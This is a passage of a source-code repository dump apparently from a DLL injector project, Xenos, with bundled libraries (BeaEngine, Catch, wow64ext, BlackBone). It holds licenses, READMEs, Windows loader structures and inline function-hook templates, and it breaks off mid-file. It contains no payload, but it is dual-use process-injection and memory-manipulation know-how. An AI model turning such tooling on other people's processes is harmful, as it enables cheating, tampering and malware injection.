https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngineCheetah.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Lib/BeaEngine.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Lib/BeaEngine.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Lib/BeaEngineCheetah.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Lib/BeaEngineCheetah.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngine64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngine64.dll -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngine64.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngine64.exp -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngine64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngine64.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngineCheetah64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngineCheetah64.dll -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngineCheetah64.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngineCheetah64.exp -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngineCheetah64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Dll/BeaEngineCheetah64.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Lib/BeaEngine64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Lib/BeaEngine64.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win64/Lib/BeaEngineCheetah64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win64/Lib/BeaEngineCheetah64.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/Catch/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Boost Software License - Version 1.0 - August 17th, 2003 2 | 3 | Permission is hereby granted, free of charge, to any person or organization 4 | obtaining a copy of the software and accompanying documentation covered by 5 | this license (the "Software") to use, reproduce, display, distribute, 6 | execute, and transmit the Software, and to prepare derivative works of the 7 | Software, and to permit third-parties to whom the Software is furnished to 8 | do so, all subject to the following: 9 | 10 | The copyright notices in the Software and this entire statement, including 11 | the above license grant, this restriction and the following disclaimer, 12 | must be included in all copies of the Software, in whole or in part, and 13 | all derivative works of the Software, unless such copies or derivative 14 | works are solely in the form of machine-executable object code generated by 15 | a source language processor. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT 20 | SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE 21 | FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE, 22 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 23 | DEALINGS IN THE SOFTWARE. 24 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/Catch/README.md: -------------------------------------------------------------------------------- 1 | ![catch logo](catch-logo-small.png) 2 | 3 | [![Github Releases](https://img.shields.io/github/release/philsquared/catch.svg)](https://github.com/philsquared/catch/releases) 4 | [![Build Status](https://travis-ci.org/philsquared/Catch.svg?branch=master)](https://travis-ci.org/philsquared/Catch) 5 | [![Build status](https://ci.appveyor.com/api/projects/status/hrtk60hv6tw6fght/branch/master?svg=true)](https://ci.appveyor.com/project/philsquared/catch/branch/master) 6 | 7 | The latest, single header, version can be downloaded directly using this link 8 | 9 | ## What's the Catch? 10 | 11 | Catch stands for C++ Automated Test Cases in Headers and is a multi-paradigm automated test framework for C++ and Objective-C (and, maybe, C). It is implemented entirely in a set of header files, but is packaged up as a single header for extra convenience. 12 | 13 | ## How to use it 14 | This documentation comprises these three parts: 15 | 16 | * [Why do we need yet another C++ Test Framework?](docs/why-catch.md) 17 | * [Tutorial](docs/tutorial.md) - getting started 18 | * [Reference section](docs/Readme.md) - all the details 19 | 20 | ## More 21 | * Issues and bugs can be raised on the [Issue tracker on GitHub](https://github.com/philsquared/Catch/issues) 22 | * For discussion or questions please use [the dedicated Google Groups forum](https://groups.google.com/forum/?fromgroups#!forum/catch-forum) 23 | * See [who else is using Catch](docs/opensource-users.md) 24 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/rewolf-wow64ext/README.md: -------------------------------------------------------------------------------- 1 | # rewolf-wow64ext 2 | WOW64Ext is a helper library for x86 programs that runs under WOW64 layer on x64 versions of Microsoft Windows operating systems. It enables x86 applications to read, write and enumerate memory of a native x64 applications. There is also possibility to call any x64 function from 64-bits version of NTDLL through a special function called X64Call(). As a bonus, wow64ext.h contains definitions of some structures that might be useful for programs that want to access PEB, TEB, TIB etc. 3 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/rewolf-wow64ext/sample/build.bat: -------------------------------------------------------------------------------- 1 | cl /Zi /D "UNICODE" ../bin/wow64ext.lib main.cpp 2 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/rewolf-wow64ext/src/CMemPtr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * WOW64Ext Library 4 | * 5 | * Copyright (c) 2014 ReWolf 6 | * http://blog.rewolf.pl/ 7 | * 8 | * This program is free software: you can redistribute it and/or modify 9 | * it under the terms of the GNU Lesser General Public License as published 10 | * by the Free Software Foundation, either version 3 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU Lesser General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU Lesser General Public License 19 | * along with this program. If not, see . 20 | * 21 | */ 22 | #pragma once 23 | 24 | class CMemPtr 25 | { 26 | private: 27 | void** m_ptr; 28 | bool watchActive; 29 | 30 | public: 31 | CMemPtr(void** ptr) : m_ptr(ptr), watchActive(true) {} 32 | 33 | ~CMemPtr() 34 | { 35 | if (*m_ptr && watchActive) 36 | { 37 | free(*m_ptr); 38 | *m_ptr = 0; 39 | } 40 | } 41 | 42 | void disableWatch() { watchActive = false; } 43 | }; 44 | 45 | #define WATCH(ptr) \ 46 | CMemPtr watch_##ptr((void**)&ptr) 47 | 48 | #define DISABLE_WATCH(ptr) \ 49 | watch_##ptr.disableWatch() 50 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/rewolf-wow64ext/src/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by wow64ext.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/rewolf-wow64ext/src/wow64ext.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/rewolf-wow64ext/src/wow64ext.rc -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/rewolf-wow64ext/src/wow64ext.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.31101.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wow64ext", "wow64ext.vcxproj", "{9DA7F232-0096-45BC-A452-24C7F3AFA0F8}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {9DA7F232-0096-45BC-A452-24C7F3AFA0F8}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {9DA7F232-0096-45BC-A452-24C7F3AFA0F8}.Debug|Win32.Build.0 = Debug|Win32 16 | {9DA7F232-0096-45BC-A452-24C7F3AFA0F8}.Release|Win32.ActiveCfg = Release|Win32 17 | {9DA7F232-0096-45BC-A452-24C7F3AFA0F8}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Asm/AsmFactory.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../Config.h" 3 | #include "../Include/Types.h" 4 | 5 | #include "AsmHelper64.h" 6 | #include "AsmHelper32.h" 7 | 8 | namespace blackbone 9 | { 10 | 11 | typedef std::unique_ptr AsmHelperPtr; 12 | 13 | /// 14 | /// Get suitable asm generator 15 | /// 16 | class AsmFactory 17 | { 18 | public: 19 | enum eAsmArch 20 | { 21 | asm32, // x86 22 | asm64 // x86_64 23 | }; 24 | 25 | /// 26 | /// Get suitable asm generator 27 | /// 28 | /// Desired CPU architecture 29 | /// AsmHelperBase interface 30 | static AsmHelperPtr GetAssembler( eAsmArch arch ) 31 | { 32 | switch (arch) 33 | { 34 | case asm32: 35 | return std::make_unique(); 36 | case asm64: 37 | return std::make_unique(); 38 | default: 39 | return nullptr; 40 | } 41 | } 42 | 43 | /// 44 | /// Get suitable asm generator 45 | /// 46 | /// Desired PE module architecture 47 | /// AsmHelperBase interface 48 | static AsmHelperPtr GetAssembler( eModType mt ) 49 | { 50 | if (mt == mt_default) 51 | mt = sizeof( intptr_t ) > sizeof( int32_t ) ? mt_mod64 : mt_mod32; 52 | 53 | switch (mt) 54 | { 55 | case mt_mod32: 56 | return GetAssembler( asm32 ); 57 | case mt_mod64: 58 | return GetAssembler( asm64 ); 59 | default: 60 | return nullptr; 61 | } 62 | } 63 | 64 | /// 65 | /// Get suitable asm generator 66 | /// 67 | /// Target process CPU architecture 68 | /// AsmHelperBase interface 69 | static AsmHelperPtr GetAssembler( bool wow64process ) 70 | { 71 | return GetAssembler( wow64process ? asm32 : asm64 ); 72 | } 73 | 74 | 75 | /// 76 | /// Get default asm generator 77 | /// 78 | /// 79 | static AsmHelperPtr GetAssembler() 80 | { 81 | #ifdef USE64 82 | return std::make_unique(); 83 | #else 84 | return std::make_unique(); 85 | #endif 86 | } 87 | }; 88 | 89 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Asm/LDasm.h: -------------------------------------------------------------------------------- 1 | #ifndef _LDASM_ 2 | #define _LDASM_ 3 | 4 | #include "../Config.h" 5 | #include 6 | #include 7 | 8 | #ifdef USE64 9 | #define is_x64 1 10 | #else 11 | #define is_x64 0 12 | #endif//USE64 13 | 14 | #ifdef __cplusplus 15 | extern "C" 16 | { 17 | #endif 18 | 19 | #define F_INVALID 0x01 20 | #define F_PREFIX 0x02 21 | #define F_REX 0x04 22 | #define F_MODRM 0x08 23 | #define F_SIB 0x10 24 | #define F_DISP 0x20 25 | #define F_IMM 0x40 26 | #define F_RELATIVE 0x80 27 | 28 | typedef struct _ldasm_data 29 | { 30 | uint8_t flags; 31 | uint8_t rex; 32 | uint8_t modrm; 33 | uint8_t sib; 34 | uint8_t opcd_offset; 35 | uint8_t opcd_size; 36 | uint8_t disp_offset; 37 | uint8_t disp_size; 38 | uint8_t imm_offset; 39 | uint8_t imm_size; 40 | } ldasm_data; 41 | 42 | BLACKBONE_API unsigned int __fastcall ldasm( void *code, ldasm_data *ld, uint32_t is64 ); 43 | BLACKBONE_API unsigned long __fastcall SizeOfProc( void *Proc ); 44 | BLACKBONE_API void* __fastcall ResolveJmp( void *Proc ); 45 | 46 | #ifdef __cplusplus 47 | } 48 | #endif 49 | 50 | #endif//_LDASM_ -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Config.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Lib/Dll switch 4 | #if !defined(BLACKBONE_EXPORTS) && !defined(BLACKBONE_IMPORTS) && !defined(BLACKBONE_STATIC) 5 | #define BLACKBONE_STATIC 6 | #endif 7 | 8 | #if defined(_MSC_VER) 9 | 10 | #define COMPILER_MSVC 11 | 12 | #if defined(BLACKBONE_IMPORTS) 13 | #define BLACKBONE_API __declspec(dllimport) 14 | #elif defined(BLACKBONE_EXPORTS) 15 | #define BLACKBONE_API __declspec(dllexport) 16 | #else 17 | #define BLACKBONE_API 18 | #endif 19 | 20 | #elif defined(__GNUC__) 21 | #define COMPILER_GCC 22 | #define BLACKBONE_API 23 | #else 24 | #error "Unknown or unsupported compiler" 25 | #endif 26 | 27 | // No IA64 support 28 | #if defined (_M_AMD64) || defined (__x86_64__) 29 | #define USE64 30 | #elif defined (_M_IX86) || defined (__i386__) 31 | #define USE32 32 | #else 33 | #error "Unknown or unsupported platform" 34 | #endif 35 | 36 | 37 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/CallResult.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #if _MSC_VER >= 1910 3 | 4 | #include 5 | #include 6 | 7 | namespace blackbone 8 | { 9 | /// 10 | /// Function result or failure status 11 | /// 12 | template 13 | struct call_result_t 14 | { 15 | typedef T type; 16 | 17 | NTSTATUS status = STATUS_UNSUCCESSFUL; // Execution status 18 | std::optional result_data = std::nullopt; // Returned value 19 | 20 | call_result_t() = default; 21 | 22 | call_result_t( const T& result_, NTSTATUS status_ = STATUS_SUCCESS ) 23 | : status ( status_ ) 24 | , result_data ( std::move( result_ ) ) 25 | { 26 | assert( result_data.has_value() ); 27 | } 28 | 29 | call_result_t( NTSTATUS status_ ) 30 | : status ( status_ ) 31 | { 32 | assert( status_ != STATUS_SUCCESS ); 33 | } 34 | 35 | inline bool success() const { return NT_SUCCESS( status ); } 36 | inline T& result() { return result_data.value(); } 37 | inline const T& result() const { return result_data.value(); } 38 | inline T result( const T& def_val ) const { return result_data.value_or( def_val ); } 39 | 40 | inline explicit operator bool() const { return NT_SUCCESS( status ); } 41 | inline explicit operator T() const { return result_data.value(); } 42 | 43 | inline T* operator ->() { return &result_data.value(); } 44 | inline T& operator *() { return result_data.value(); } 45 | }; 46 | } 47 | #endif -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/NativeEnums.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | namespace blackbone 3 | { 4 | 5 | enum MEMORY_INFORMATION_CLASS 6 | { 7 | MemoryBasicInformation = 0, 8 | MemoryWorkingSetList, 9 | MemorySectionName, 10 | MemoryBasicVlmInformation, 11 | MemoryWorkingSetExList 12 | }; 13 | 14 | enum SECTION_INFORMATION_CLASS 15 | { 16 | SectionBasicInformation, 17 | SectionImageInformation 18 | }; 19 | 20 | enum POOL_TYPE 21 | { 22 | NonPagedPool, 23 | PagedPool, 24 | NonPagedPoolMustSucceed, 25 | DontUseThisType, 26 | NonPagedPoolCacheAligned, 27 | PagedPoolCacheAligned, 28 | NonPagedPoolCacheAlignedMustS 29 | }; 30 | 31 | // 32 | // Loader related 33 | // 34 | enum _LDR_DDAG_STATE 35 | { 36 | LdrModulesMerged = -5, 37 | LdrModulesInitError = -4, 38 | LdrModulesSnapError = -3, 39 | LdrModulesUnloaded = -2, 40 | LdrModulesUnloading = -1, 41 | LdrModulesPlaceHolder = 0, 42 | LdrModulesMapping = 1, 43 | LdrModulesMapped = 2, 44 | LdrModulesWaitingForDependencies = 3, 45 | LdrModulesSnapping = 4, 46 | LdrModulesSnapped = 5, 47 | LdrModulesCondensed = 6, 48 | LdrModulesReadyToInit = 7, 49 | LdrModulesInitializing = 8, 50 | LdrModulesReadyToRun = 9 51 | }; 52 | 53 | enum _LDR_DLL_LOAD_REASON 54 | { 55 | LoadReasonStaticDependency = 0, 56 | LoadReasonStaticForwarderDependency = 1, 57 | LoadReasonDynamicForwarderDependency = 2, 58 | LoadReasonDelayloadDependency = 3, 59 | LoadReasonDynamicLoad = 4, 60 | LoadReasonAsImageLoad = 5, 61 | LoadReasonAsDataLoad = 6, 62 | LoadReasonUnknown = -1 63 | }; 64 | 65 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/Types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "NativeStructures.h" 4 | #include "FunctionTypes.h" 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | namespace blackbone 11 | { 12 | 13 | typedef uint64_t ptr_t; // Generic pointer in remote process 14 | typedef ptr_t module_t; // Module base pointer 15 | 16 | // Type of barrier 17 | enum eBarrier 18 | { 19 | wow_32_32 = 0, // Both processes are WoW64 20 | wow_64_64, // Both processes are x64 21 | wow_32_64, // Managing x64 process from WoW64 process 22 | wow_64_32, // Managing WOW64 process from x64 process 23 | }; 24 | 25 | struct Wow64Barrier 26 | { 27 | eBarrier type = wow_32_32; 28 | bool sourceWow64 = false; 29 | bool targetWow64 = false; 30 | bool x86OS = false; 31 | bool mismatch = false; 32 | }; 33 | 34 | // Module type 35 | enum eModType 36 | { 37 | mt_mod32, // 64 bit module 38 | mt_mod64, // 32 bit module 39 | mt_default, // type is deduced from target process 40 | mt_unknown // Failed to detect type 41 | }; 42 | 43 | // Module search method 44 | enum eModSeachType 45 | { 46 | LdrList, // InLoadOrder list 47 | Sections, // Scan for section objects 48 | PEHeaders, // Scan for PE headers in memory 49 | }; 50 | 51 | // Switch created wow64 thread to long mode 52 | enum eThreadModeSwitch 53 | { 54 | NoSwitch, // Never switch 55 | ForceSwitch, // Always switch 56 | AutoSwitch // Switch depending on wow64 barrier 57 | }; 58 | 59 | // Module info 60 | struct ModuleData 61 | { 62 | module_t baseAddress; // Base image address 63 | std::wstring name; // File name 64 | std::wstring fullPath; // Full file path 65 | uint32_t size; // Size of image 66 | eModType type; // Module type 67 | bool manual; // Image is manually mapped 68 | 69 | bool operator ==(const ModuleData& other) const 70 | { 71 | return (baseAddress == other.baseAddress); 72 | } 73 | 74 | bool operator <(const ModuleData& other) 75 | { 76 | return baseAddress < other.baseAddress; 77 | } 78 | }; 79 | 80 | typedef std::shared_ptr ModuleDataPtr; 81 | 82 | } 83 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/Win7Specific.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Winheaders.h" 4 | 5 | namespace blackbone 6 | { 7 | template 8 | struct _LDR_DATA_TABLE_ENTRY_W7 : _LDR_DATA_TABLE_ENTRY_BASE_T 9 | { 10 | _LIST_ENTRY_T ForwarderLinks; 11 | _LIST_ENTRY_T ServiceTagLinks; 12 | _LIST_ENTRY_T StaticLinks; 13 | T ContextInformation; 14 | uint32_t OriginalBase; 15 | LARGE_INTEGER LoadTime; 16 | }; 17 | 18 | template 19 | struct _RTL_INVERTED_FUNCTION_TABLE7 20 | { 21 | uint32_t Count; 22 | uint32_t MaxCount; 23 | uint32_t Epoch; 24 | _RTL_INVERTED_FUNCTION_TABLE_ENTRY Entries[0x200]; 25 | }; 26 | 27 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/Win8Specific.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Winheaders.h" 4 | 5 | namespace blackbone 6 | { 7 | 8 | template 9 | struct _RTL_RB_TREE 10 | { 11 | T Root; 12 | T Min; 13 | }; 14 | 15 | template 16 | struct _RTL_BALANCED_NODE 17 | { 18 | T Left; 19 | T Right; 20 | T ParentValue; 21 | }; 22 | 23 | template 24 | struct _LDR_DDAG_NODE 25 | { 26 | _LIST_ENTRY_T Modules; 27 | T ServiceTagList; 28 | uint32_t LoadCount; 29 | uint32_t ReferenceCount; 30 | uint32_t DependencyCount; 31 | T RemovalLink; 32 | T IncomingDependencies; 33 | _LDR_DDAG_STATE State; 34 | T CondenseLink; 35 | uint32_t PreorderNumber; 36 | uint32_t LowestLink; 37 | }; 38 | 39 | template 40 | struct _LDR_DATA_TABLE_ENTRY_W8 : _LDR_DATA_TABLE_ENTRY_BASE_T 41 | { 42 | T DdagNode; // _LDR_DDAG_NODE* 43 | _LIST_ENTRY_T NodeModuleLink; 44 | T SnapContext; 45 | T ParentDllBase; 46 | T SwitchBackContext; 47 | _RTL_BALANCED_NODE BaseAddressIndexNode; 48 | _RTL_BALANCED_NODE MappingInfoIndexNode; 49 | T OriginalBase; 50 | LARGE_INTEGER LoadTime; 51 | uint32_t BaseNameHashValue; 52 | _LDR_DLL_LOAD_REASON LoadReason; 53 | uint32_t ImplicitPathOptions; 54 | }; 55 | 56 | template 57 | struct _RTL_INVERTED_FUNCTION_TABLE8 58 | { 59 | ULONG Count; 60 | ULONG MaxCount; 61 | ULONG Epoch; 62 | UCHAR Overflow; 63 | _RTL_INVERTED_FUNCTION_TABLE_ENTRY Entries[0x200]; 64 | }; 65 | 66 | typedef _LDR_DATA_TABLE_ENTRY_W8 _LDR_DATA_TABLE_ENTRY_W832; 67 | typedef _LDR_DATA_TABLE_ENTRY_W8 _LDR_DATA_TABLE_ENTRY_W864; 68 | typedef _LDR_DATA_TABLE_ENTRY_W8 LDR_DATA_TABLE_ENTRY_W8T; 69 | 70 | typedef _LDR_DDAG_NODE _LDR_DDAG_NODE_32; 71 | typedef _LDR_DDAG_NODE _LDR_DDAG_NODE_64; 72 | typedef _LDR_DDAG_NODE LDR_DDAG_NODE_T; 73 | 74 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/WinXPSpecific.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Winheaders.h" 4 | 5 | namespace blackbone 6 | { 7 | #pragma warning(disable : 4201) 8 | typedef struct _IMAGE_DELAYLOAD_DESCRIPTOR 9 | { 10 | union 11 | { 12 | DWORD AllAttributes; 13 | struct { 14 | DWORD RvaBased : 1; // Delay load version 2 15 | DWORD ReservedAttributes : 31; 16 | }; 17 | } Attributes; 18 | 19 | DWORD DllNameRVA; // RVA to the name of the target library (NULL-terminate ASCII string) 20 | DWORD ModuleHandleRVA; // RVA to the HMODULE caching location (PHMODULE) 21 | DWORD ImportAddressTableRVA; // RVA to the start of the IAT (PIMAGE_THUNK_DATA) 22 | DWORD ImportNameTableRVA; // RVA to the start of the name table (PIMAGE_THUNK_DATA::AddressOfData) 23 | DWORD BoundImportAddressTableRVA; // RVA to an optional bound IAT 24 | DWORD UnloadInformationTableRVA; // RVA to an optional unload info table 25 | DWORD TimeDateStamp; // 0 if not bound, Otherwise, date/time of the target DLL 26 | } IMAGE_DELAYLOAD_DESCRIPTOR, *PIMAGE_DELAYLOAD_DESCRIPTOR; 27 | #pragma warning(default : 4201) 28 | 29 | typedef struct _EXCEPTION_REGISTRATION_RECORD 30 | { 31 | _EXCEPTION_REGISTRATION_RECORD *Next; 32 | PEXCEPTION_ROUTINE Handler; 33 | } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD; 34 | 35 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Include/Winheaders.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef WIN32_LEAN_AND_MEAN 4 | #define WIN32_LEAN_AND_MEAN 5 | #endif 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #pragma warning(disable : 4005) 14 | #include 15 | #pragma warning(default : 4005) 16 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/LocalHook/HookHandlerCdecl.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace blackbone 4 | { 5 | 6 | template 7 | struct HookHandler : public DetourBase 8 | { 9 | typedef typename std::conditional::value, int, R>::type ReturnType; 10 | 11 | typedef R( __cdecl *type )(Args...); 12 | typedef R( __cdecl *hktype )(Args&...); 13 | typedef R( C::*hktypeC )(Args&...); 14 | 15 | // 16 | // Workaround for void return type 17 | // 18 | typedef ReturnType( __cdecl *typeR )(Args...); 19 | typedef ReturnType( __cdecl *hktypeR )(Args&...); 20 | typedef ReturnType( C::*hktypeCR )(Args&...); 21 | 22 | static __declspec(noinline) ReturnType __cdecl Handler( Args... args ) 23 | { 24 | HookHandler* pInst = (HookHandler*)((_NT_TIB*)NtCurrentTeb())->ArbitraryUserPointer; 25 | return pInst->HandlerP( std::forward( args )... ); 26 | } 27 | 28 | ReturnType HandlerP( Args&&... args ) 29 | { 30 | ReturnType val_new, val_original; 31 | 32 | DisableHook(); 33 | 34 | if (_order == CallOrder::HookFirst) 35 | { 36 | val_new = CallCallback( std::forward( args )... ); 37 | val_original = CallOriginal( std::forward( args )... ); 38 | } 39 | else if (_order == CallOrder::HookLast) 40 | { 41 | val_original = CallOriginal( std::forward( args )... ); 42 | val_new = CallCallback( std::forward( args )... ); 43 | } 44 | else 45 | { 46 | val_original = val_new = CallCallback( std::forward( args )... ); 47 | } 48 | 49 | if (this->_hooked) 50 | EnableHook(); 51 | 52 | return (_retType == ReturnMethod::UseOriginal ? val_original : val_new); 53 | } 54 | 55 | inline ReturnType CallOriginal( Args&&... args ) 56 | { 57 | return (reinterpret_cast(_callOriginal))(args...); 58 | } 59 | 60 | inline ReturnType CallCallback( Args&&... args ) 61 | { 62 | if (_callbackClass != nullptr) 63 | return (reinterpret_cast(_callbackClass)->*brutal_cast(_callback))(args...); 64 | else 65 | return (reinterpret_cast(_callback))(args...); 66 | } 67 | }; 68 | 69 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/LocalHook/HookHandlerFastcall.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace blackbone 4 | { 5 | 6 | template 7 | struct HookHandler : public DetourBase 8 | { 9 | typedef typename std::conditional::value, int, R>::type ReturnType; 10 | 11 | typedef R( __fastcall *type )(Args...); 12 | typedef R( __fastcall *hktype )(Args&...); 13 | typedef R( C::*hktypeC )(Args&...); 14 | 15 | // 16 | // Workaround for void return type 17 | // 18 | typedef ReturnType( __fastcall *typeR )(Args...); 19 | typedef ReturnType( __fastcall *hktypeR )(Args&...); 20 | typedef ReturnType( C::*hktypeCR )(Args&...); 21 | 22 | static __declspec(noinline) ReturnType __fastcall Handler( Args... args ) 23 | { 24 | HookHandler* pInst = (HookHandler*)((_NT_TIB*)NtCurrentTeb())->ArbitraryUserPointer; 25 | return pInst->HandlerP( std::forward( args )... ); 26 | } 27 | 28 | ReturnType HandlerP( Args&&... args ) 29 | { 30 | ReturnType val_new, val_original; 31 | 32 | DisableHook(); 33 | 34 | if (_order == CallOrder::HookFirst) 35 | { 36 | val_new = CallCallback( std::forward( args )... ); 37 | val_original = CallOriginal( std::forward( args )... ); 38 | } 39 | else if (_order == CallOrder::HookLast) 40 | { 41 | val_original = CallOriginal( std::forward( args )... ); 42 | val_new = CallCallback( std::forward( args )... ); 43 | } 44 | else 45 | { 46 | val_original = val_new = CallCallback( std::forward( args )... ); 47 | } 48 | 49 | if (this->_hooked) 50 | EnableHook(); 51 | 52 | return (_retType == ReturnMethod::UseOriginal ? val_original : val_new); 53 | } 54 | 55 | inline ReturnType CallOriginal( Args&&... args ) 56 | { 57 | return (reinterpret_cast(_callOriginal))(args...); 58 | } 59 | 60 | inline 